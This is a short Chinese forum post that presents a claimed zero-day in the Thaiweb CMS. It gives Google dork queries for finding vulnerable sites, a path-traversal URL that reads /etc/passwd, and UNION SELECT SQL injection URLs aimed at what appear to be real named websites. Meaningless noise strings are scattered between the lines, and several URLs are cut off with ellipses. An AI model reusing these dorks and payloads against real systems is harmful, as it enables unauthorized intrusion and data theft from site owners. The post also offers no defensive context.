Thaiweb远程文件sql注入漏洞0day

admin

Google之:
/ Q1 B9 @5 Y* ^. i
intext:powered by Thaiweb

inurl:index.php?page=board.php
* i+ w; S) t7 o
8 ?7 n8 L$ p- l: P8 h# q' n; b' G! n& l
1 ^6 V5 ]- Q' E
利用点1:http://www.xfack.com/index.php?p ... ../../../etc/passwd
/ ~- |( m1 Q* E" l# b
$ f) J8 H% r$ p) T* P

利用点2:http://www.xfack.com/index.php?page=boardque.php&bod_id=4'

6 `' d/ j, s- k9 F% e. F7 t
2 ~) H. ~* j% i% ]& L
$ e* M" x7 ]2 f0 c- F9 T# Dhttp://www.keytasin.com//index.p ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--

http://www.autopartnerthailand.c ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--

http://gift.in.th/index.php?page ... d=-4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
7 T2 w; E  `# h' k( v